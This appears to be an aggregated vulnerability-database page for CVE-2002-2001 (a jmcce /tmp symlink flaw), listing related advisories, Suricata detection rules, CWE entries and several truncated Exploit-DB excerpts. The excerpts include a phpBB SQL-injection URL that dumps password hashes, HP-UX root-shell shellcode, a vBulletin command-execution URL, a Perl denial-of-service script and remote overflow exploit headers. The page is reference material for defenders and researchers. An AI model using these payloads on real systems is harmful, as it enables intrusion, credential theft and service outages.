CVE-2002-2001
Published 2002-12-31
CVE-2002-2001: jmcce 1.3.8 in Mandrake 8.1 creates log files in /tmp with predictable names, which allows local users to overwrite arbitrary files via a symlink attack.
Priority: P4 · 6 · low
CVSS 2.0: 1.2 (AV:L/AC:H/Au:N/C:N/I:P/A:N)
EPSS: 0.29% (21.3th percentile)
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| jmcce | jmcce | — | — |
| mandrakesoft | mandrake_linux | — | — |
CVSS provenance
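| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 1.2 | LOW | AV:L/AC:H/Au:N/C:N/I:P/A:N |
| vendor_redhat | — | 7.5 | HIGH | — |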
GHSA
GHSA-x5v5-9fj9-665w: jmcce 1
ghsa_unreviewed·2022-04-30
CVE-2002-2001 [LOW] GHSA-x5v5-9fj9-665w: jmcce 1
jmcce 1.3.8 in Mandrake 8.1 creates log files in /tmp with predictable names, which allows local users to overwrite arbitrary files via a symlink attack.
Red Hat
security flaw
vendor_redhat·2002-09-30·CVSS 2.1
CVE-2002-0399 [LOW] security flaw
Directory traversal vulnerability in GNU tar 1.13.19 through 1.13.25, and possibly later versions, allows attackers to overwrite arbitrary files during archive extraction via a (1) "/.." or (2) "./.." string, which removes the leading slash but leaves the "..", a variant of CVE-2001-1267.
Red Hat
security flaw
vendor_redhat·2002-05-10·CVSS 7.5
CVE-2002-0379 [HIGH] security flaw
Buffer overflow in University of Washington imap server (uw-imapd) imap-2001 (imapd 2001.315) and imap-2001a (imapd 2001.315) with legacy RFC 1730 support, and imapd 2000.287 and earlier, allows remote authenticated users to execute arbitrary code via a long BODY request.
Suricata
GPL FTP CWD overflow attempt
suricata·2010-09-23
CVE-1999-0219 GPL FTP CWD overflow attempt
Rule: alert ftp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL FTP CWD overflow attempt"; flow:established,to_server; content:"CWD"; nocase; isdataat:100,relative; pcre:"/^CWD\s[^\n]{100}/smi"; reference:bugtraq,11069; reference:bugtraq,1227; reference:bugtraq,1690; reference:bugtraq,6869; reference:bugtraq,7251; reference:bugtraq,7950; reference:cve,1999-0219; reference:cve,1999-1058; reference:cve,1999-1510; reference:cve,2000-1035; reference:cve,2000-1194; reference:cve,2001-0781; reference:cve,2002-0126; reference:cve,2002-0405; classtype:attempted-admin; sid:2101919; rev:25; metadata:created_at 2010_09_23, cve CVE_1999_0219, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
Suricata
GPL FTP LIST directory traversal attempt
suricata·2010-09-23
CVE-2002-1054 GPL FTP LIST directory traversal attempt
Rule: alert ftp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL FTP LIST directory traversal attempt"; flow:established,to_server; content:"LIST"; nocase; content:".."; distance:1; content:".."; distance:1; reference:cve,2002-1054; reference:bugtraq,2618; reference:nessus,11112; reference:cve,2001-0680; classtype:protocol-command-decode; sid:2101992; rev:12; metadata:created_at 2010_09_23, cve CVE_2001_0680, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_11_26, mitre_tactic_id TA0007, mitre_tactic_name Discovery, mitre_technique_id T1083, mitre_technique_name File_And_Directory_Discovery; target:dest_ip;)
Suricata
GPL FTP USER overflow attempt
suricata·2010-09-23
CVE-1999-1510 GPL FTP USER overflow attempt
Rule: alert ftp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL FTP USER overflow attempt"; flow:established,to_server,no_stream; content:"USER|20|"; nocase; isdataat:100,relative; pcre:"/^USER\x20[^\x00\x20\x0a\x0d]{100}/smi"; reference:bugtraq,10078; reference:bugtraq,1227; reference:bugtraq,1504; reference:bugtraq,1690; reference:bugtraq,4638; reference:bugtraq,7307; reference:bugtraq,8376; reference:cve,1999-1510; reference:cve,1999-1514; reference:cve,1999-1519; reference:cve,1999-1539; reference:cve,2000-0479; reference:cve,2000-0656; reference:cve,2000-0761; reference:cve,2000-0943; reference:cve,2000-1035; reference:cve,2000-1194; reference:cve,2001-0256; reference:cve,2001-0794; reference:cve,2001-0826; reference:cve,2002-0126; reference:cve,2002-1522;
Exploit-DB
Fully Modded phpBB - 'kb.php' SQL Injection
exploitdb·2008-03-12
CVE-2008-1350 Fully Modded phpBB - 'kb.php' SQL Injection
---
# Powered by phpBB © 2001, 2006 phpBB Group
# Modified by Fully Modded phpBB © 2002, 2006
#
#########################################################################
#
# AUTHOR : TurkishWarriorr
#
# HOME : http://www.1923turk.org
#
#########################################################################
#
# DORKS 1 : allinurl :kb.php?mode=article&k
# DORKS 2 : article&k=
# DORKS 3 : "Powered by phpBB © 2001, 2006 phpBB Group" "Modified by Fully Modded phpBB © 2002, 2006"
#
##########################################################################
EXPLOIT :
kb.php?mode=article&k=-1+union+select+1,1,concat(user_id,char(58),username,char(58),user_password),4,5,6,7,8,9,10,11,12,13+from+phpbb_users+where+user_id+=2&page_num=2&cat=1
#####
Exploit-DB
HP-UX 11.0/11.11 - 'swxxx' Privilege Escalation
exploitdb·2002-12-11
CVE-2001-0979 HP-UX 11.0/11.11 - 'swxxx' Privilege Escalation
---
/*
Program : x_hpux_11i_sw.c
Use : HP-UX 11.11/11.0 exploit swxxx to get local root shell.
Complie : cc x_hpux_11i_sw.c -o x_sw;./x_sw ( not use gcc for some system)
Usage : ./x_sw [ off ]
Tested : HP-UX B11.11 & HP-UX B11.0
Author : watercloud [@] xfocus.org
Date : 2002-12-11
Note : Use as your own risk !!
*/
#include
#define T_LEN 2124
#define BUFF_LEN 1688
#define NOP 0x0b390280
char shellcode[]=
"\x0b\x5a\x02\x9a\x34\x16\x03\xe8\x20\x20\x08\x01\xe4\x20\xe0\x08"
"\x96\xd6\x04\x16\xeb\x5f\x1f\xfd\x0b\x39\x02\x99\xb7\x5a\x40\x22"
"\x0f\x40\x12\x0e\x20\x20\x08\x01\xe4\x20\xe0\x08\xb4\x16\x70\x16"
"/bin/shA";
long addr;
char buffer_env[2496];
char buffer[T_LEN];
void main(argc,argv)
int argc;
char ** argv;
{
int addr_off = 8208;
long a
Exploit-DB
Monkey HTTP Server 0.4/0.5 - Invalid POST Denial of Service
exploitdb·2002-11-02
CVE-2002-1663 Monkey HTTP Server 0.4/0.5 - Invalid POST Denial of Service
---
source: https://www.securityfocus.com/bid/6096/info
A denial of service vulnerability has been reported for Monkey HTTP server. The vulnerability is due to inadequate checks being performed when decoding POST requests.
An attacker can exploit this vulnerability by issuing a POST request with an invalid Content-Length header, or without a Content-Length value. When the server attempts to service the request, it will crash and lead to the denial of service condition.
POST / HTTP/1.1
Host: 127.0.0.1:2001
Content-Length: 1
Exploit-DB
vBulletin 2.0.3 - 'calendar.php' Command Execution
exploitdb·2002-09-27
CVE-2002-1660 vBulletin 2.0.3 - 'calendar.php' Command Execution
---
source: https://www.securityfocus.com/bid/5820/info
A remote command execution vulnerability has been reported for vBulletin. The vulnerability is due to vBulletin failing to properly sanitize user-supplied input from URI parameters.
An attacker can exploit this vulnerability to execute malicious commands on the vulnerable system.
http://www.example.com/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60%20%60;die();echo%22
where signifies a command to be executed on the system.
Exploit-DB
Squid 2.4.1 - Remote Buffer Overflow
exploitdb·2002-05-14
CVE-2002-0163 Squid 2.4.1 - Remote Buffer Overflow
---
/* 7350squish - x86/linux squid remote exploit
*
* TESO CONFIDENTIAL - SOURCE MATERIALS
*
* This is unpublished proprietary source code of TESO Security.
*
* The contents of these coded instructions, statements and computer
* programs may not be disclosed to third parties, copied or duplicated in
* any form, in whole or in part, without the prior written permission of
* TESO Security. This includes especially the Bugtraq mailing list, the
* www.hack.co.za website and any public exploit archive.
*
* The distribution restrictions cover the entire file, including this
* header notice. (This means, you are not allowed to reproduce the header).
*
* (C) COPYRIGHT TESO Security, 2001
* All Rights Reserved
*
* bug found by scut 2001/09/10
* further resear
Exploit-DB
WU-IMAPd 2000/2001 - Partial Mailbox Attribute Remote Buffer Overflow (1)
exploitdb·2002-05-10
CVE-2002-0379 WU-IMAPd 2000/2001 - Partial Mailbox Attribute Remote Buffer Overflow (1)
---
// source: https://www.securityfocus.com/bid/4713/info
Wu-imapd is vulnerable to a buffer overflow condition. This has been reported to occur when a valid user requests partial mailbox attributes. Exploitation may result in the execution of arbitrary code as the server process. An attacker may also be able to crash the server, resulting in a denial of service condition.
This only affects versions of imapd with legacy RFC 1730 support, which is disabled by default in imapd 2001.313 and imap-2001.315.
/*
* http://www.freeweb.nu/mantra/05_2002/uw-imapd.html
*
* uw-imapd.c - Remote exploit for uw imapd CAPABILITY IMAP4
*
* Copyright (C) 2002 Christophe "korty" Bailleux
* Copyright (C) 2002 Kostya Kortchinsky
*
*
Exploit-DB
WU-IMAPd 2000/2001 - Partial Mailbox Attribute Remote Buffer Overflow (2)
exploitdb·2002-05-10
CVE-2002-0379 WU-IMAPd 2000/2001 - Partial Mailbox Attribute Remote Buffer Overflow (2)
---
// source: https://www.securityfocus.com/bid/4713/info
Wu-imapd is vulnerable to a buffer overflow condition. This has been reported to occur when a valid user requests partial mailbox attributes. Exploitation may result in the execution of arbitrary code as the server process. An attacker may also be able to crash the server, resulting in a denial of service condition.
This only affects versions of imapd with legacy RFC 1730 support, which is disabled by default in imapd 2001.313 and imap-2001.315.
/*
* 0x3a0x29wuim.c - WU-IMAP 2000.287 (linux/i86) remote exploit
*
* dekadish
*
* 0x3a0x29 crew
*
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
Exploit-DB
SSH (x2) - Remote Command Execution
exploitdb·2002-05-01
CVE-2001-0144 SSH (x2) - Remote Command Execution
---
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/349.tgz (x2.tgz)
# milw0rm.com [2002-05-01]
Exploit-DB
XTux Server 2001.0 6.01 - Garbage Denial of Service
exploitdb·2002-03-09
CVE-2002-0431 XTux Server 2001.0 6.01 - Garbage Denial of Service
---
source: https://www.securityfocus.com/bid/4260/info
XTux is a multiplayer network game for Linux. The server component (June 01, 2001 version) is vulnerable to a denial of service initiated by connecting to the server and sending unexpected characters. This causes the server to become unresponsive and consume resources.
#!/usr/bin/perl
#
# xtux server DoS - by b0iler
# server will become unresponcive and takes up lots of CPU.
use IO::Socket;
for($n=0;$nnew(PeerAddr => $ARGV[0], PeerPort =>
$ARGV[1], Proto => 'tcp' ) or print "\ncouldn't connect\n\n";
sleep 3;
print $sock "garbage data\n\n";
}
exit;
Exploit-DB
Sudo 1.6.x - Password Prompt Heap Overflow
exploitdb·2001-11-01
CVE-2002-0184 Sudo 1.6.x - Password Prompt Heap Overflow
---
// source: https://www.securityfocus.com/bid/4593/info
Sudo is a widely used Linux/Unix utility that allows users to securely run commands as other users.
Sudo is vulnerable to a heap overflow condition related to its customizable password prompt feature. The nature of the sudo utility requires that it be installed setuid root. Successful exploitation may allow local attackers to gain root privileges.
/*
* Created: November 1, 2001
* Updated: August 8, 2002
* Updated-2: November 4, 2002 by Eds and Dexter_Man
* ______
* / ___\ __ _ ____ ____ ____ ____ ____ __ _
* \____ \/ / \/ \/ \/ _ \ \ _ \/ / \
* / \___ \ \ \ \ \ ___/ \_/___ \___ \
* \______ / ____/__/ /__/ /___ \__/ / ____/ ____/
* \/\/ \/ \/ \/ \/ \/
*
* Hudo versus Linux/Intel Sudo
*
Exploit-DB
Microsoft Outlook 98/2000/2002 - Arbitrary Code Execution
exploitdb·2001-07-12
CVE-2001-0538 Microsoft Outlook 98/2000/2002 - Arbitrary Code Execution
---
source: https://www.securityfocus.com/bid/3026/info
Microsoft Outlook introduces a vulnerability that may allow attackers to execute arbitrary commands on a target system.
The vulnerability is due to a new ActiveX control called 'Microsoft Outlook View Control'. The flaw is that this control is marked 'safe for scripting' when it should not be. It is therefore accessible by scripts.
Scripts can execute commands without user knowledge or consent.
This assumes you have at least one message in Outlook XP's Inbox
function f()
{
//alert(o2.object);
sel=o1.object.selection;
vv1=sel.Item(1);
alert("Subject="+vv1.Subject);
alert("Body="+vv1.Body+"["+vv1.HTMLBody+"]");
alert("May be deleted");
//vv1.Delete();
vv2=vv1.Session.App
Exploit-DB
Microsoft Outlook 98/2000/2002 - Unauthorized Email Access
exploitdb·2001-07-12
CVE-2001-0538 Microsoft Outlook 98/2000/2002 - Unauthorized Email Access
---
source: https://www.securityfocus.com/bid/3025/info
Microsoft Outlook introduces a vulnerability that may allow attackers to access and manipulate user email.
The vulnerability is due to a new ActiveX control called 'Microsoft Outlook View Control'. The flaw is that this control is marked 'safe for scripting' when it should not be. It is therefore accessible by scripts.
Scripts can access and perform operations on user email through this control without user knowledge or consent.
This assumes you have at least one message in Outlook XP's Inbox
function f()
{
//alert(o2.object);
sel=o1.object.selection;
vv1=sel.Item(1);
alert("Subject="+vv1.Subject);
alert("Body="+vv1.Body+"["+vv1.HTMLBody+"]");
alert("May be deleted");
Exploit-DB
ghttpd 1.4 - Daemon Buffer Overflow
exploitdb·2001-06-17
CVE-2002-1904 ghttpd 1.4 - Daemon Buffer Overflow
---
// source: https://www.securityfocus.com/bid/2879/info
ghttpd is a freely available, open source web server for Unix systems. ghttpd supports CGI and is easy to configure and use.
A buffer overflow is known to exist in ghttp which will allow arbitrary code to be executed with the privileges of the webserver.
Proof-of-concept code has demonstrated that this vulnerability can be exploited by remote attackers.
/*
* GazTek HTTP Daemon v1.4 (ghttpd) Linux x86 remote exploit
* by qitest1 - 17/06/2001
*
* Root privileges are dropped out by the daemon, so a shell owned by
* nobody will be executed.
*
* 0x69.. =)
*/
#include
#include
#include
#include
#include
#define RETPOS 161
struct targ
{
int def;
char *descr;
unsigned long int retaddr;
};
struc
Exploit-DB
Solaris 7/8 - 'kcms_configure' Command-Line Buffer Overflow (2)
exploitdb·2001-04-09
CVE-2001-0594 Solaris 7/8 - 'kcms_configure' Command-Line Buffer Overflow (2)
---
// source: https://www.securityfocus.com/bid/2558/info
The Kodak Color Management System, or KCMS, is a package that ships with workstation installations of Solaris 7 and 8. kcms_configure, a part of KCMS, is vulnerable to a buffer overflow if it is passed an overly long string on the command-line by a local user. kcms_configure is installed setuid root, so a buffer overflow can lead to arbitrary code execution as root.
An exploit for x86 Solaris is available to attackers.
/* kcms_configure -o -S command line buffer overflow, SPARC/solaris 8
*
* https://www.securityfocus.com/bid/2558
*
* Coded June 22, 2002 by Adam Slattery. Phear. The vulnerability
* was discovered a long time ago (04/2001), but there haven't been
*
Bugzilla
CVE-2002-0379 security flaw
bugzilla·2018-08-16·CVSS 7.5
CVE-2002-0379 [HIGH] CVE-2002-0379 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
Buffer overflow in University of Washington imap server (uw-imapd) imap-2001 (imapd 2001.315) and imap-2001a (imapd 2001.315) with legacy RFC 1730 support, and imapd 2000.287 and earlier, allows remote authenticated users to execute arbitrary code via a long BODY request.
Bugzilla
CVE-2002-0399 security flaw
bugzilla·2018-08-16·CVSS 2.1
CVE-2002-0399 [LOW] CVE-2002-0399 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
Directory traversal vulnerability in GNU tar 1.13.19 through 1.13.25, and possibly later versions, allows attackers to overwrite arbitrary files during archive extraction via a (1) "/.." or (2) "./.." string, which removes the leading slash but leaves the "..", a variant of CVE-2001-1267.
Bugzilla
tcpdump problem with bgp decoding
bugzilla·2003-01-29
[MEDIUM] tcpdump problem with bgp decoding
The BGP decoding routines for tcpdump used incorrect bounds checking when
copying data. This could be abused by introducing malicious traffic on a sniffed
network for a denial of service attack against tcpdump, or possibly even remote
code execution.
RHSA-2002:094 patched CAN-2002-0380 with tcpdump-3.6.2-11
AS/RHSA-2002:121 patched CAN-2002-0380 with tcpdump-3.6.2-11
See http://marc.theaimsgroup.com/?l=bugtraq&m=103956164004031&w=2
also http://www.tcpdump.org/lists/workers/2001/10/msg00101.html
3.6.* is vulnerable, 3.7 isn't
CVE applied for Dec11: CAN-2002-1350
Discussion:
*** Bug 80152 has been marked as a duplicate of this bug. ***
---
An errata has been issued which should help the problem described in this bug report.
This report is therefore
CWE
Improper Handling of Undefined Parameters
mitre_cwe·CVSS 5.0
CVE-2002-1488 [MEDIUM] CWE-236 Improper Handling of Undefined Parameters
CWE-236: Improper Handling of Undefined Parameters
The product does not handle or incorrectly handles when a particular parameter, field, or argument name is not defined or supported by the product.
Modes of Introduction:
Phase: Implementation
Common Consequences:
Scope: Integrity. Impact: Unexpected State.
Observed Examples:
CVE-2002-1488: Crash in IRC client via PART message from a channel the user is not in.
CVE-2001-0650: Router crash or bad route modification using BGP updates with invalid transitive attribute.
CWE
Path Equivalence: 'filename/' (Trailing Slash)
mitre_cwe·CVSS 5.0
[MEDIUM] CWE-49 Path Equivalence: 'filename/' (Trailing Slash)
CWE-49: Path Equivalence: 'filename/' (Trailing Slash)
The product accepts path input in the form of trailing slash ('filedir/') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.
Modes of Introduction:
Phase: Implementation
Phase: Operation
Common Consequences:
Scope: Confidentiality, Integrity. Impact: Read Files or Directories, Modify Files or Directories.
Observed Examples:
CVE-2002-0253: Overlaps infoleak
CVE-2001-0446: Application server allows remote attackers to read source code for .jsp files by appending a / to the requested URL.
CVE-2004-0334: Bypass Basic Authentication for files using trailing "/"
CVE-2001-0893: Read sensitive files with trailing "/
CWE
Improper Preservation of Permissions
mitre_cwe·CVSS 7.8
[HIGH] CWE-281 Improper Preservation of Permissions
CWE-281: Improper Preservation of Permissions
The product does not preserve permissions or incorrectly preserves permissions when copying, restoring, or sharing objects, which can cause them to have less restrictive permissions than intended.
Modes of Introduction:
Phase: Implementation
Note: REALIZATION: This weakness is caused during implementation of an architectural security tactic.
Phase: Operation
Common Consequences:
Scope: Confidentiality, Integrity. Impact: Read Application Data, Modify Application Data.
Observed Examples:
CVE-2002-2323: Incorrect ACLs used when restoring backups from directories that use symbolic links.
CVE-2001-1515: Automatic modification of permissions inherited from another file system.
CVE-2005-1920: Permissions on backup file are created with defaults,
CWE
Authentication Bypass by Primary Weakness
mitre_cwe·CVSS 6.4
CVE-2002-1374 [MEDIUM] CWE-305 Authentication Bypass by Primary Weakness
CWE-305: Authentication Bypass by Primary Weakness
The authentication algorithm is sound, but the implemented mechanism can be bypassed as the result of a separate weakness that is primary to the authentication error.
Modes of Introduction:
Phase: Implementation
Note: REALIZATION: This weakness is caused during implementation of an architectural security tactic.
Common Consequences:
Scope: Access Control. Impact: Bypass Protection Mechanism.
Observed Examples:
CVE-2002-1374: The provided password is only compared against the first character of the real password.
CVE-2000-0979: The password is not properly checked, which allows remote attackers to bypass access controls by sending a 1-byte password that matches the first character of the real password.
CVE-2001-0088: Chain: Forum softwa
CWE
The UI Performs the Wrong Action
mitre_cwe·CVSS 5.0
CVE-2001-1387 [MEDIUM] CWE-449 The UI Performs the Wrong Action
CWE-449: The UI Performs the Wrong Action
The UI performs the wrong action with respect to the user's request.
Modes of Introduction:
Phase: Implementation
Common Consequences:
Scope: Other. Impact: Quality Degradation, Varies by Context.
Detection Methods:
Manual Analysis: Perform extensive functionality testing of the UI. The UI should behave as specified.
Observed Examples:
CVE-2001-1387: Network firewall accidentally implements one command line option as if it were another, possibly leading to behavioral infoleak.
CVE-2001-0081: Command line option correctly suppresses a user prompt but does not properly disable a feature, although when the product prompts the user, the feature is properly disabled.
CVE-2002-1977: Product does not "time out" according to user specification, leavin
http://www.iss.net/security_center/static/7980.php
http://www.mandriva.com/security/advisories?name=MDKSA-2002:008
http://www.securityfocus.com/bid/3940